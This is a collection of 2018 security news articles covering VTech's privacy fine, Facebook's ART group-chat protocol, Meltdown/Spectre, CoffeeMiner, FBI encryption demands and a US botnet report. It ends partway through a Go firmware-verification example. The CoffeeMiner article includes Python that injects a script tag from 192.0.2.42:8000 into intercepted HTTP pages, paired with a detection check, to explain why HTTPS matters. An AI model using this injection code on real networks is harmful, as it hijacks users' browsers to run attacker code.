STE WILLIAMS

Smart-toymaker VTech fined over charges of violating child privacy law

In 2015, smart toymaker VTech tripped. And it fumbled a whole lot of frighteningly specific data about children when it did.

Well, allegedly, at any rate. An intruder claimed to have broken into the company’s servers and ripped off data that they said was so sensitive it made them queasy.

With good reason: the intruder claimed to have accessed photos of kids and parents, chat logs and audio files. The FTC said the intruder got first names, genders and birthdays of about 638,000 children. The intruder said they also got email addresses, encrypted passwords, secret questions and answers for password retrieval, IP addresses, mailing addresses and download histories; that personal data pertained to 4,833,678 parents, the intruder said.

On Monday, VTech didn’t admit to wrongdoing, but it did settle Federal Trade Commission (FTC) charges that the company violated children’s privacy law – that would be the Children’s Online Privacy Protection Act (COPPA) – and the FTC Act.

The FTC announced on Monday that VTech had agreed to settle for a civil fine of $650,000.

In a complaint filed by the US Department of Justice on behalf of the FTC, the commission alleged that VTech’s Kid Connect app collected the personal information that was allegedly breached. Kid Connect is a service that allows parents and kids to chat via a mobile phone app and a VTech tablet.

The FTC said in the complaint that VTech “failed to provide direct notice to parents or obtain verifiable consent from parents concerning its information collection practices, as required under [COPPA].”

The FTC also alleged that VTech “failed to use reasonable and appropriate data security measures to protect personal information it collected”. The Commission said that this is its first completed children’s privacy case involving internet-connected toys.

The Hong Kong toymaker not only (allegedly) lost the data: it also dinged customer confidence by slipping in a tweaked terms and conditions policy that passed the buck for any future breach to its customers, like so:

You acknowledge and agree that any information you send or receive during your use of the site may not be secure and may be intercepted or later acquired by unauthorized parties.

I mean, c’mon, VTech said when it amended the policy in February 2016, a few months after the breach disclosure: security isn’t something you can actually guarantee. CSO Online at the time quoted Grace Pang, head of corporate marketing at VTech Holdings Ltd.:

No company that operates online can provide a 100% guarantee that it won’t be hacked. The Learning Lodge Terms and Conditions[*], like the Terms and Conditions for many online sites and services, simply recognize that fact by limiting the company’s liability for the acts of third parties such as hackers. Such limitations are commonplace on the Web.

(*Learning Lodge allows VTech’s customers to download games, e-books and other educational content to their VTech products, while Kid Connect allows children and parents to exchange voice and text messages, photos, drawings and stickers between its products/services and parents’ smartphones.)

The FTC complaint alleges that VTech didn’t take “reasonable steps to protect the information it collected through Kid Connect, such as implementing adequate safeguards and security measures to protect transmitted and stored information and implementing an intrusion prevention or detection system to alert the company of an unauthorized intrusion of its network.”

It also alleged that VTech violated the FTC Act by stating in its privacy policy that most personal information submitted by users through the Learning Lodge and Planet VTech would be encrypted. It was not, the Commission claims.

Beyond the monetary settlement, VTech is also permanently prohibited from violating COPPA in the future and from misrepresenting its security and privacy practices as part of the proposed settlement. It’s also facing a requirement to roll out a comprehensive data security program that will be subject to biennial, independent audits for 20 years.

Congratulations, FTC, on settling its first children’s privacy case involving connected toys. It’s unlikely to be the last, particularly given how popular connected toys are getting and how privacy and data protection aren’t always high on manufacturers’ priority lists.

Acting FTC Chairman Maureen K. Ohlhausen, from Monday’s announcement of the VTech settlement:

As connected toys become increasingly popular, it’s more important than ever that companies let parents know how their kids’ data is collected and used and that they take reasonable steps to secure that data. Unfortunately, VTech fell short in both of these areas.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/GE4IKxPoSGM/

Facebook has open-sourced encrypted group chat

Facebook has responded to governments’ criticism of cryptography by giving the world an open source encrypted group chat tool.

It’s hardly likely to endear the ad-farm to people like FBI Director Christopher Wray, who yesterday told an international infosec conference it was “ridiculous” that the Feds have seized nearly 8,000 phones they can’t access. UK prime minister Theresa May has also called for backdoors in messaging services and for social networks to stop offering “safe spaces” for extremists.

Facebook’s latest project, which went live on GitHub yesterday, tackles the problem of protecting group chat. ART, Asynchronous Ratcheting Tree, was created by Facebook’s Jon Millican and Oxford University’s Katriel Cohn-Gordon, Cas Cremers, Luke Garratt and Kevin Milner.

As the group explains in a December paper* [PDF] about ART at the International Association for Cryptologic Research (IACR) pre-press site, existing chat solutions are great between individuals but not so good at protecting group chats.

In group chats, the paper said, “WhatsApp, Facebook Messenger and the Signal app … use a simpler key-transport mechanism (‘sender keys’) which does not achieve PCS”. That’s post-compromise security: the property that, once a party’s keys have been compromised, the protocol can still re-establish secure communication for that party’s later messages.

The shortcomings of those apps, the group wrote, means if someone hacks one member of a group, they can “indefinitely and passively read future communications in that group … In practice this means that in these apps, if a third party is added to a two-party communication, the security of the communication is decreased without informing the users.”

To protect group chats, ART “derives a group key for a set of agents” that’s secure even if some members aren’t online, and “even after total compromise, an agent can participate in a secure group key exchange.”

The ART scheme sets up conversations using what the paper calls “asymmetric prekeys” (a model created by Moxie Marlinspike for TextSecure) and a one-time asymmetric setup key. The Diffie-Hellman setup key is generated by the creator of a group chat, and is only used during session creation, allowing the group leader to create secret “leaf keys” for other group members while they’re offline.

To add PCS to this, Alice needs a way to replace a leaf key if hers is compromised, and other group members need to be able to get the new key.

To get a new leaf key, Alice “computes the new public keys at all nodes along the path from her leaf to the tree root, and broadcasts to the group her public leaf key together with these public keys.”

The protocol then lets other group members compute the updated group key, “again without requiring any two group members to be online at the same time”.
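As an added worked example, not code from the paper or from Facebook’s ART repository, the following Python sketch builds a four-member key tree and runs the update described above. It assumes a toy Diffie-Hellman group (modular exponentiation with p = 2**255 - 19 and g = 2, standing in for the paper’s elliptic-curve group), uses SHA-256 as the map from a DH output to the next node’s secret, and hands the group creator every member’s leaf secret directly rather than deriving them from prekeys and the one-time setup key. The node numbering, function names and member names are the example’s own.

```python
"""Toy ART-style group key tree (added example; assumptions: toy DH group,
SHA-256 as ART's iota map, creator handed every leaf secret directly)."""
import hashlib

P = 2**255 - 19   # toy prime modulus (assumption; not a vetted DH group)
G = 2             # toy generator (assumption)

def scalar(seed: bytes) -> int:
    """Derive a private scalar in [1, P-2] from bytes."""
    return int.from_bytes(hashlib.sha256(seed).digest(), "big") % (P - 2) + 1

def public(priv: int) -> int:
    return pow(G, priv, P)

def dh(priv: int, other_pub: int) -> int:
    return pow(other_pub, priv, P)

def iota(shared: int) -> int:
    """Map a DH output to the parent node's secret key (stands in for ART's iota)."""
    return scalar(b"ART-iota|" + shared.to_bytes(32, "big"))

# Nodes are numbered heap-style: root = 1, children of i are 2i and 2i+1,
# and with n members (n a power of two) member m sits at leaf n + m.
def sibling(i: int) -> int:
    return i ^ 1

def parent(i: int) -> int:
    return i // 2

class PublicTree:
    """What every member sees: the public key of every node."""
    def __init__(self, n_members: int):
        assert n_members & (n_members - 1) == 0, "toy tree wants a power of two"
        self.n = n_members
        self.pub = {}

def setup_group(leaf_secrets):
    """Creator builds the initial tree bottom-up (here she knows every leaf secret)."""
    n = len(leaf_secrets)
    tree = PublicTree(n)
    secret = {n + m: s for m, s in enumerate(leaf_secrets)}
    for node in range(n - 1, 0, -1):            # internal nodes, lowest level first
        secret[node] = iota(dh(secret[2 * node], public(secret[2 * node + 1])))
    tree.pub = {node: public(s) for node, s in secret.items()}
    return tree

def path_secrets(tree, leaf: int, leaf_secret: int) -> dict:
    """Secrets at every node from `leaf` up to the root, from the member's own leaf
    secret plus the public keys of the siblings along the way (the copath)."""
    secrets = {leaf: leaf_secret}
    node, s = leaf, leaf_secret
    while node > 1:
        s = iota(dh(s, tree.pub[sibling(node)]))
        node = parent(node)
        secrets[node] = s
    return secrets

def group_key(tree, member: int, leaf_secret: int) -> bytes:
    """The shared group key is a KDF of the root secret."""
    root = path_secrets(tree, tree.n + member, leaf_secret)[1]
    return hashlib.sha256(b"ART-group-key|" + root.to_bytes(32, "big")).digest()

def update_message(tree, member: int, new_leaf_secret: int) -> dict:
    """Member ratchets: new public keys for its leaf and every ancestor, to broadcast."""
    return {node: public(s)
            for node, s in path_secrets(tree, tree.n + member, new_leaf_secret).items()}

def apply_update(tree, message: dict) -> None:
    """Any member, whenever it next comes online, merges the broadcast and rederives."""
    tree.pub.update(message)

def demo():
    """Four members agree on a key; Alice's leaf leaks; she ratchets; the leak is useless."""
    leaves = [scalar(name) for name in (b"alice", b"bob", b"charlie", b"dave")]  # constructed
    tree = setup_group(leaves)
    keys = {group_key(tree, m, leaves[m]) for m in range(4)}
    assert len(keys) == 1                  # everyone derives the same key from their copath
    old_key = keys.pop()
    stolen = leaves[0]                     # attacker learns Alice's leaf secret
    leaves[0] = scalar(b"alice-fresh")     # Alice picks a fresh leaf key ...
    apply_update(tree, update_message(tree, 0, leaves[0]))   # ... and broadcasts her path
    new_keys = {group_key(tree, m, leaves[m]) for m in range(4)}
    assert len(new_keys) == 1
    new_key = new_keys.pop()
    attacker_key = group_key(tree, 0, stolen)   # old leaf against the updated tree
    return old_key, new_key, attacker_key

if __name__ == "__main__":
    old, new, attacker = demo()
    print("key rotated:", old != new, "| stolen leaf still yields new key:", attacker == new)
```

Running demo() shows three things: every member derives the same key from nothing more than its own leaf secret and the public copath; Alice’s broadcast of her new leaf and path public keys lets the others rederive a fresh key with no further interaction, so nobody has to be online at the same time; and an attacker holding her old leaf secret can only recompute the old key. What the toy leaves out is everything ART does around the tree: authentication of the update message, the prekey-based setup, and a real group.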

The implementation Facebook published is offered under a Creative Commons license. ®

*Bootnote: There’s no significance whatever to the IACR paper’s filename being “666.pdf”, we’re sure you’ll agree.


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/01/10/facebook_opensources_encrypted_group_chat_tools/

Russia claims it repelled home-grown drone swarm in Syria

The Russian Defense Ministry has reported that its forces in Syria have been attacked by a swarm of GPS-guided drones carrying improvised explosives.

The attack took place on the night of December 5, when 13 drones were picked up on radar. Ten aimed themselves at Russia’s Hmeymim air base and three more headed for a logistics and supply base near the Syrian city of Tartus.

According to the Russians, six of the drones were pwned by electronic warfare specialists and diverted from the attack. Of those six, three were successfully collected for examination but the remainder detonated after landing. The Russians report the other seven were blown up midair by a Pantsir-S anti-aircraft missile system.


“Currently, the Russian military experts are analyzing the construction, technical filling and improvised explosives of the captured UAVs,” said the statement.

“Having decoded the data recorded on the UAVs, the specialists found out the launch site. It was the first time when terrorists applied a massed drone aircraft attack launched at a range of more than 50 km using modern GPS guidance system.”

While this sounds scary, the pictures of the drones posted by the Russians raise some serious questions about the efficacy of the technology used. While the home-made bombs look authentic, the drones themselves look cobbled together and low-tech.

(Image: “Deadly payload that wasn’t delivered”)

The drones appear to be powered by a single propeller that will be familiar to anyone who has flown model aircraft. They also bore a control package and presumably a fuel tank built into the body of the drone, but appear to have few metal parts and lack even landing wheels. Russia has not shown details of the GPS control system, but insists they were highly advanced machines.

“Attacks on the Russian objects in Syria could be received from one of countries with high-technological capabilities of satellite navigation and remote dropping control of professionally assembled improvised explosive devices in assigned coordinates,” Russia’s military said.

Drones have become increasingly common weapons for forces of all sizes. Even the medieval terror bastards in Iraq have adopted the use of drones, using commercially bought quadcopters to drop mortar shells and hand grenades on opposition forces.

“The Russian specialists are determining supply channels, through which terrorists had received the technologies and devices, as well as examining type and origin of explosive compounds used in the IEDs,” the ministry said.

“The fact of usage of strike aircraft-type drones by terrorists is the evidence that militants have received technologies to carry out terrorist attacks using such UAVs in any country.” ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/01/10/syrian_drone_swarm/

Taiwanese cops give malware-laden USB sticks as prizes for security quiz

Winners of a security quiz staged by Taiwan’s Criminal Investigation Bureau may be wondering why they tried so hard to do well after some of the USB drives handed out as prizes turned out to be wretched hives of malware and villainy.

According to the Taipei Times, the Bureau hosted an infosec event in December 2017, and gave 250 drives to people who won a cybersecurity quiz.

It’s since emerged that 54 of the 8GB drives were infected by a computer used by an employee of supplier Shawo Hwa Industries Co “to transfer an operating system to the drives and test their storage capacity”.

While the dongles were manufactured in China, the Taipei Times said there’s no suggestion that espionage was a motive.

The good news, such as it is, is that the infection was an old piece of malware that Chinese-language site Liberty Times names as “XtbSeDuA.exe” and that tries to steal personal data from 32-bit machines.

The CIB says stolen data was forwarded to a relay IP address in Poland that in 2015 was associated with Europol raids on an electronic funds fraud ring. The police added that the server receiving the data from the latest infections has been shut down.

The prizes were handed out from December 11 to December 12, when complaints from the public started arriving, but 34 of the drives are still in circulation somewhere. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/01/10/taiwanese_police_malware/


Intel, Microsoft confess: Meltdown, Spectre may slow your servers

Analysis After spending last week insisting that the performance impact of fixing the Meltdown and Spectre CPU vulnerabilities “should not be significant,” Intel on Tuesday tried to maintain that stance even as it acknowledged SYSmark tests assessing post-patch slowdowns ranging from two per cent to 14 per cent.

Reiterating that typical consumer and business usage – reading email, opening documents, and accessing digital photos – should not exhibit any performance hit from remediation, Intel said, “8th Generation Core platforms with solid state storage will see a performance impact of six per cent or less.”

That’s a dubious carve-out because so much consumer and business computing relies on cloud-based servers, which, as The Register reported on Monday, have exhibited slower response times and increased CPU utilization arising from the fixes rolled out by affected vendors.

Intel’s effort to minimize the consequences of the two flaws looks a lot like a preemptive defense against litigation.

It’s too late for that. At least eight lawsuits against Intel have been filed since The Register first reported the flaws on January 2.

Chipzilla may also be concerned about scrutiny from the Securities and Exchange Commission: CEO Brian Krzanich sold off most of his company stock in November, several months after Intel was made aware of the Meltdown and Spectre vulnerabilities. Even if the sale was made as part of a pre-established plan, the timing looks terrible.

Too blunt, time to punt

Also hard on the eye is the decision by Carnegie Mellon University’s (CMU) Software Engineering Institute to water down CERT/CC’s initial Meltdown/Spectre vulnerability notice, as it is easily interpreted as an attempt to dampen concerns.

CMU’s initial advice, issued on January 3, advised replacing CPUs because the “underlying vulnerability is primarily caused by CPU architecture design choices.”

A revision that appeared the following day removed that recommendation even though others have said as much. For instance, Daniel Genkin, a postdoctoral researcher who helped uncover the flaws, told The Register that a lasting fix requires hardware redesign.

In a phone interview, The Register asked Art Manion, vulnerability analysis technical manager at the CERT division of CMU’s Software Engineering Institute and the author of Vulnerability Note VU#584653, whether Intel had pressured CERT to revise its language.

Manion acknowledged that vendors including Intel had been in contact as part of the disclosure process, but he insisted the initial wording and the revision came from the CERT Coordination Center rather than elsewhere.

In this particular instance, he said, CERT was not involved in the pre-public coordination of the disclosure. And once the story broke, “we were scrambling,” he said.

Initially, he said, it looked like a problem tied to hardware. Upon further analysis and communication with vendors, he said, “We decided the language was too blunt.”

Hardware plays a role, he said, “but one of the tenets of our advice is to provide actionable information.”

In other words, telling the world to toss the bulk of the processors produced in the past decade just wasn’t a realistic response.

The Register asked Intel whether it had requested more moderate language.

In an email, an Intel spokesperson said, “I can confirm that we were in touch with CERT. I don’t have anything to add to that.”

Chipzilla’s terrifying response: a new branch on the org chart

While Intel would have the outside world overlook the whole affair, the chipmaker has reportedly reorganized internally to focus more on security. On Monday, The Oregonian reported that Krzanich has shuffled top executives to create a new internal security group called Intel Product Assurance and Security, headed by human resources head Leslie Culbertson.

In a related, belated recognition of the value of security, Intel introduced its first bug bounty program for its own products in March last year.

In any event, Intel’s downplaying of meaningful consequences from Meltdown and Spectre appears to have become unsustainable after Red Hat last week said the impact of patches ranged from 1 to 20 per cent in its benchmarks and Microsoft on Tuesday said something similar.

Microsoft did not release specific benchmark numbers and declined to provide them to The Register, though it said it would release results once the tests are complete.

However, in a blog post Tuesday, Terry Myerson, president of Microsoft’s Windows and device group, did confirm varied degrees of delay, depending on the hardware and software involved.

On Windows 10 PCs with Skylake, Kaby Lake or newer CPUs, the effect of vulnerability mitigation is minimal. But with Windows 10 running on older hardware, Myerson said, “we expect that some users will notice a decrease in system performance.”

For users of Windows 8 and Windows 7, Myerson said, “we expect most users to notice a decrease in system performance.”

For Windows Server, Myerson suggested, it could be worse still, with IO-intensive applications showing “a more significant performance impact when you enable the mitigations to isolate untrusted code within a Windows Server instance.”

In fact, the impact is significant enough in Windows Server customers that Myerson suggests dropping shields for speed. He advises those running Windows Server “to evaluate the risk of untrusted code for each Windows Server instance, and balance the security versus performance tradeoff for your environment.”

There you have it: security or performance. Choose one. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/01/10/intel_allows_that_meltdown_and_spectre_may_slow_servers_down/

IBM’s complete Meltdown fix won’t land until mid-February

IBM has started to release its own patches for the Meltdown mess and the Spectre SNAFU, which it has half-confirmed affect its hardware and operating systems, but won’t have a complete fix until mid-February.

We say half-confirmed because Big Blue has only said it has problems with the processor issues Google mentioned last week, rather than naming either bug.

The company strongly hinted that POWER systems were in trouble last Thursday, January 4th. On Tuesday the 9th the company confirmed the problem, admitting that its kit “could allow a party that has access to the system to access unauthorized data.”


The fix has two steps: IBM wrote that it “involves installing patches to both system firmware and operating systems. The firmware patch provides partial remediation to these vulnerabilities and is a pre-requisite for the OS patch to be effective.”

As of Tuesday, the POWER7+ and POWER8 patches are ready. IBM’s promised POWER9 patches on January 15th. So that’s the pre-requisites sorted. But patches for AIX and the i operating system “will be available February 12.” That’s more than a month away at the time of writing.

While it prepares its OS patches, IBM’s advised clients that “If this vulnerability poses a risk to your environment, then the first line of defense is the firewalls and security tools that most organizations already have in place.” Big Blue’s also said “Clients should review these patches in the context of their datacenter environment and standard evaluation practices to determine if they should be applied.”

The latter is a motherhood statement but perhaps also tacit recognition that AIX and i often run in environments where applications are so sensitive to downtime that change windows are few and far between.

That means the lag between CPU patches and OS patches might not be entirely unwelcome in some IBM shops as they’ve got a month to plan the firmware upgrade on test and dev rigs and can plan one nice big change window not long after the OS patches drop in mid-February. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/01/10/ibm_meltdown_spectre_patches_not_arriving_until_mid_february/

CoffeeMiner project lets you hack public Wi-Fi to mine cryptocoins

Remember how an Argentinian Starbucks store recently turned out to be doing JavaScript cryptomining on the side?

That’s where someone else uses your computer, via your web browser, to perform a series of calculations that help to generate some sort of cryptocurrency, and keeps the proceeds for themselves.

In that case, it seems to have been a unilateral decision by the Wi-Fi provider to include coin mining JavaScript code in the Wi-Fi registration page.

We’re guessing that the provider figured it would be OK to “borrow” approximately 10 seconds of CPU time whenever someone connected to the Wi-Fi, presumably as a way of earning a few extra pennies in return for providing free internet access:

(Just for the record, the tweeter was wrong above, inasmuch as the code was mining Monero, not Bitcoin – but the sentiment was spot-on.)

Starbucks wasn’t impressed, and “took swift action to ensure [the] internet provider resolved the issue”.

We’re guessing here, but we’re prepared to assume that this “swift action” involved a very short phone call in a rather loud voice.

But it’s not only the Wi-Fi operator or the coffee shop owner that you need to worry about.

If you join a public Wi-Fi network, and you don’t use a VPN, or stick to HTTPS websites, or both, then…

…anyone else in the coffee shop (or bus, or train, or hotel lobby, or wherever it is) at the same time can sniff out what you’re doing, and perhaps also trick you into seeing and doing something you didn’t expect.

Thanks to a “for academic purposes only” project called CoffeeMiner, rogues in your local cafe can now trick you into cryptomining, along with any other web-based cyberdodginess they might have in mind:

The project is the brainchild of a software developer from Barcelona who goes by the name Arnau Code, and if you ignore its potential for misuse (please read the disclaimer!), we think it’s a well-prepared tutorial about Man-in-the-Middle (MitM) attacks.

If you’ve ever wondered why HTTPS (the padlock in your browser) really matters, and why every site really ought to use it instead of serving up content using plain old HTTP, you should look at Arnau’s article. Don’t just take it from us that HTTPS is about more than secrecy. The CoffeeMiner project is a good reminder that HTTPS is about authenticity and tamper-resistance, too – getting the right stuff from the right place.

A MitM attack is where someone else on the network gets to see your network requests before they set off to their final destination, and can intercept the replies before they get back to you.

Instead of talking directly to the site you’re expecting, you are effectively talking through a middleman, who can alter what you ask in the first place, and change what you see in reply.

Altering the answers is what CoffeeMiner does: through a variety of tricks, it intercepts your web traffic before it reaches the Wi-Fi access point in the coffee shop; it covertly fetches the web page you requested on your behalf; and it sneaks a line of coin-mining JavaScript into the reply.

In other words, every website you visit could, in theory, end up temporarily mining cryptocurrency for someone else.

Simply explained, CoffeeMiner:

  • Tricks your computer into thinking that the CoffeeMiner machine is the access point (ARP spoofing). The open source dsniff suite is used for this part.
  • Passes on all your network traffic directly except for web requests.
  • Pushes your web traffic into a man-in-the-middle proxy. The open source toolkit mitmproxy is used here.
  • Inserts one line of coin-mining HTML into your web replies.

The CoffeeMiner code doesn’t actually inject coin mining code directly; instead it injects a line like this:

The IP address and port (in this example, 192.0.2.42:8000) point to a web server running on the CoffeeMiner computer itself – in fact, it’s part of the CoffeeMiner toolkit – that serves up the actual cryptomining code of your choice. (Arnau Code chose a widespread miner known as CoinHive.)
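As an added example (not CoffeeMiner’s own code, which is a mitmproxy script), here is the injection step in plain Python against one captured HTTP response, together with the check a defender can run over a saved page or proxy log. The host and port 192.0.2.42:8000 come from the article; the script path /script.js, the sample response and the function names are assumptions of this example.

```python
"""Injection step of a CoffeeMiner-style MitM, plus a check for its fingerprint.
Added example, not CoffeeMiner's code. Host/port from the article; path assumed."""
import re

INJECTED_TAG = b'<script src="http://192.0.2.42:8000/script.js"></script>'  # assumed path

# A constructed HTTP response, as a coffee-shop captive page might serve it.
SAMPLE_BODY = b"<html><head><title>Menu</title></head><body>Latte 3.50</body></html>"
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    + b"Content-Type: text/html; charset=utf-8\r\n"
    + b"Content-Length: " + str(len(SAMPLE_BODY)).encode() + b"\r\n"
    + b"\r\n" + SAMPLE_BODY
)

def inject_tag(body: bytes, tag: bytes = INJECTED_TAG) -> bytes:
    """Put the tag just before </body> (or </html>), so it loads as part of the page."""
    low = body.lower()
    for marker in (b"</body>", b"</html>"):
        i = low.rfind(marker)
        if i != -1:
            return body[:i] + tag + body[i:]
    return body + tag

def rewrite_http_response(raw: bytes, tag: bytes = INJECTED_TAG) -> bytes:
    """Rewrite one plaintext response the way the proxy hook would. Only identity-encoded
    text/html bodies with a Content-Length are touched, and that header is corrected;
    otherwise the browser truncates the body and the injected tag never runs.
    Compressed or chunked bodies would have to be decoded first (mitmproxy does that)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return raw
    status, *header_lines = head.split(b"\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip().lower()
    if not headers.get(b"content-type", b"").startswith(b"text/html"):
        return raw
    if headers.get(b"content-encoding", b"identity") != b"identity":
        return raw
    if b"content-length" not in headers:
        return raw
    new_body = inject_tag(body, tag)
    new_header_lines = [
        b"Content-Length: " + str(len(new_body)).encode()
        if line.lower().startswith(b"content-length:") else line
        for line in header_lines
    ]
    return b"\r\n".join([status, *new_header_lines]) + b"\r\n\r\n" + new_body

# Defender side: script tags loaded over plain HTTP from a bare IP address are rare
# on real sites and are exactly what this kind of injection produces.
SCRIPT_SRC = re.compile(rb"""<script[^>]*\ssrc=["']?(http://[^"'\s>]+)""", re.IGNORECASE)
IP_HOST = re.compile(rb"^http://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?(?:/|$)")

def suspicious_script_sources(html: bytes) -> list:
    """Return plain-HTTP script URLs whose host is a literal IPv4 address."""
    return [m.group(1) for m in SCRIPT_SRC.finditer(html) if IP_HOST.match(m.group(1))]

if __name__ == "__main__":
    tampered = rewrite_http_response(SAMPLE_RESPONSE)
    print(tampered.decode())
    print("suspicious:", suspicious_script_sources(tampered.partition(b"\r\n\r\n")[2]))
```

The Content-Length correction is the detail naive injectors get wrong: if the header still carries the old length, the browser cuts the body short and the injected tag never executes. Over HTTPS none of this works without a certificate the browser will refuse, which is the article’s point about authenticity and tamper-resistance.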

What to do?

This isn’t really a lesson about cryptomining, though that certainly adds to the intrigue.

The problem here is that on an untrusted network (and that means almost every network you’ll ever use these days, because it’s hard to vouch for every user and every device attached at any moment), a rogue user can very easily mess with any web traffic that isn’t encrypted using HTTPS.

Without HTTPS, there is no confidentiality, so anyone can see what you are doing and saying; there is no identification, so you have no idea who’s replying; and there is no integrity, because you can’t tell when someone has tampered with what you’ve just downloaded, for example by stuffing a coin mining script into every web page.

As we mentioned at the start:

  • Stick to sites that use HTTPS. A web-based MitM attack will almost always trigger a warning that you are connecting via an imposter server.
  • Urge sites that don’t yet use HTTPS to start doing so. It’s a little bit more work, but worth the effort.
  • Use a VPN if your work provides one. This encrypts all your network traffic back to head office, not just your web browsing.

By the way, if you want to run a VPN at home, and you have a spare computer handy, why not try the Sophos XG Firewall Home Edition? You get a free licence for everything the product can do, including anti-virus, web filtering, email security, IPS, plus a fully-fledged VPN.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/uFsL29U7Xvk/

FBI says it can’t unlock 8,000 encrypted devices, demands backdoors for America’s ‘public safety’

FBI Director Christopher Wray has picked up where he left off last year with a new call for backdoors in encryption exclusively for law enforcement.

Speaking at the International Conference on Cyber Security in New York today, Wray complained that in the past year the Feds have seized 7,775 devices that they can’t unlock and decrypt. He said the situation was ridiculous, and called on the technology industry to find a solution. Essentially, let Uncle Sam’s g-men decrypt data stored on devices on demand, while still somehow keeping stuff secure against hackers and other crooks, he argued.

“Being unable to access those devices is a major public safety issue and impacts our investigations across the board,” he said. “This problem will require a thoughtful and sensible approach. We have people devoted to working with stakeholders to find a way forward. We need the private sector’s help.”

He claimed that the problem was impeding cases involving human trafficking, counterterrorism, organized crime, and child exploitation.


Wray said the FBI was undergoing a digital revolution to deal with the increased investigations into electronic devices. He likened it to the kind of reorganization the agency went through after the September 11 terrorist attack.

Now, he claimed, there are cyber task forces in every FBI field office, and there are national cyber action teams who can be deployed at a moment’s notice. Too bad they aren’t that good at their jobs, and occasionally miss their chance to unlock devices without resorting to federally mandated backdoors.

“The FBI has to recognize that there’s a technology and digital component to almost every case we have,” he said. “Transnational crime groups, sexual predators, fraudsters and terrorists are transforming the way they do business as technology evolves.”

What Wray wants is a secure form of encryption that contains a flaw that only law enforcement can find and exploit. Trouble is, scumbags will no doubt find and leverage it, too. The FBI boss’s predecessor James Comey also had an obsession with effectively weakening citizens’ security. Comey constantly complained that criminals were “going dark” using encryption.

The problem for the FBI, and others of a similar mind, is that there isn’t some rainbow unicorn software solution to implementing a cops-only backdoor in secure end-to-end or storage encryption. The finest minds in cryptography – and the NSA – are united on this score. It’s mathematically impossible to introduce an encryption backdoor that only law enforcement can find and use. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/01/09/fbi_boss_backdooring_encryption/

Teach citizens IoT dangers, engineering students cybersecurity, Uncle Sam suggests

The US Department of Commerce (DoC) and Department of Homeland Security have put out a draft cybersecurity report that recommends, among other things, that the American government fund a public awareness campaign on IoT security, and make cybersecurity a compulsory part of future engineering degrees.

The 38-page report [PDF] titled “Enhancing the Resilience of the Internet and Communications Ecosystem Against Botnets and Other Automated, Distributed Threats” is the first of many that are heading to the president’s desk following an executive order signed in May, after a number of abortive attempts.

The report is pretty good: it identifies the current issues facing government, industry and consumers when it comes to cybersecurity – focused specifically on botnets, as the title suggests – and is largely written in plain English. It doesn’t gloss over problems, nor does it hype up some threats or diminish others. In short, it is the kind of professionally produced policy paper that the government still, fortunately, produces despite the noise and nonsense above civil servants.

The only issue that is notable by its absence is the inter-agency battle going on within the US government to take the lead on internet security and the internet-of-things (IoT).

As is typical in such documents, however, many of the actual recommendations are a little wishy-washy. Such as the key “goal” to “identify a clear pathway toward an adaptable, sustainable, and secure technology marketplace.” Or “promote innovation.” Or “build coalitions.”

Due to its traditional hands-off approach to industry and the fact that the internet mostly resides in private hands, there is little that the DoC or DHS can do in real, solid terms. But it does identify where the problems lie and the best way to fix them.

Consumers

Perhaps the most useful part of the report is the recognition that you cannot and should not expect consumers to be responsible for the internal security of devices that they buy in a store and then connect to their home wireless.

This is especially true when it comes to the “internet of things” – a market that the report correctly notes is “much like that of desktop computing in the 1990s”, i.e., massively insecure.

“IoT devices are often sorely lacking in such security-focused features,” the report stated. “These systems now offer the most attractive target to malicious actors, and are an increasingly large percentage of the devices in the ecosystem.”

It went on: “The reality is that consumers are not directly affected by compromises of their devices; in fact, the consumer may never know that the device is part of a botnet. From the consumer’s perspective, the webcam is still streaming, or the refrigerator is still chilling.

“For this reason, it is impractical to hold the owners responsible if their devices are used in a botnet. This lack of clear consequences of infection creates a challenge in motivating consumers to take steps to improve security, for example, to update even those devices that are updateable.”

Which is hardly news to IT professionals but it is good to see the problem stated clearly and succinctly in a US government report.

The dossier also noted that software and firmware security updates and similar best practices are a pretty effective solution to IoT insecurity, but the problem is that too few companies or individuals actually apply them. And so, it argued, as many have for years, that security needs to be baked into devices, including secure automated updates.

“Ideally, devices marketed toward consumers should be designed with security built in,” the document read. “Consumer products should be designed as securely as possible, should include secure automated update mechanisms, and should have few to no requirements for managing the products.”
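What a “secure automated update mechanism” has to check before it touches flash is easy to state and easy to get wrong. The following is an added example, not code from the report or from any vendor it discusses: a device-side verifier that accepts a firmware image only if the vendor’s signature over a small manifest checks out under a public key pinned in the device, the manifest version is newer than what is installed (no rollback to a buggy release), and the image hashes to the digest the manifest names. Ed25519 from Go’s standard library stands in for whatever signature scheme a real vendor uses; the manifest format is an assumption made for the example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"errors"
	"fmt"
)

// Manifest is the metadata the vendor signs for each release (format assumed for this example).
// Signing the manifest rather than the raw image keeps the signed blob tiny and lets the
// version number travel under the same signature as the image digest.
type Manifest struct {
	Version uint32   // monotonically increasing release number
	Digest  [32]byte // SHA-256 of the firmware image
}

// encode produces the exact bytes that are signed and verified.
func (m Manifest) encode() []byte {
	buf := make([]byte, 4+32)
	binary.BigEndian.PutUint32(buf[:4], m.Version)
	copy(buf[4:], m.Digest[:])
	return buf
}

var (
	ErrBadSignature   = errors.New("manifest signature invalid")
	ErrRollback       = errors.New("update version not newer than installed version")
	ErrDigestMismatch = errors.New("image digest does not match signed manifest")
)

// SignManifest is the vendor side; the private key stays offline at the vendor.
func SignManifest(priv ed25519.PrivateKey, m Manifest) []byte {
	return ed25519.Sign(priv, m.encode())
}

// VerifyUpdate is the device side. Order matters: the signature is checked before anything
// in the manifest is trusted, the version check runs before hashing a possibly large image,
// and only an image whose digest matches the signed manifest is accepted.
func VerifyUpdate(pinnedPub ed25519.PublicKey, installed uint32, m Manifest, sig, image []byte) error {
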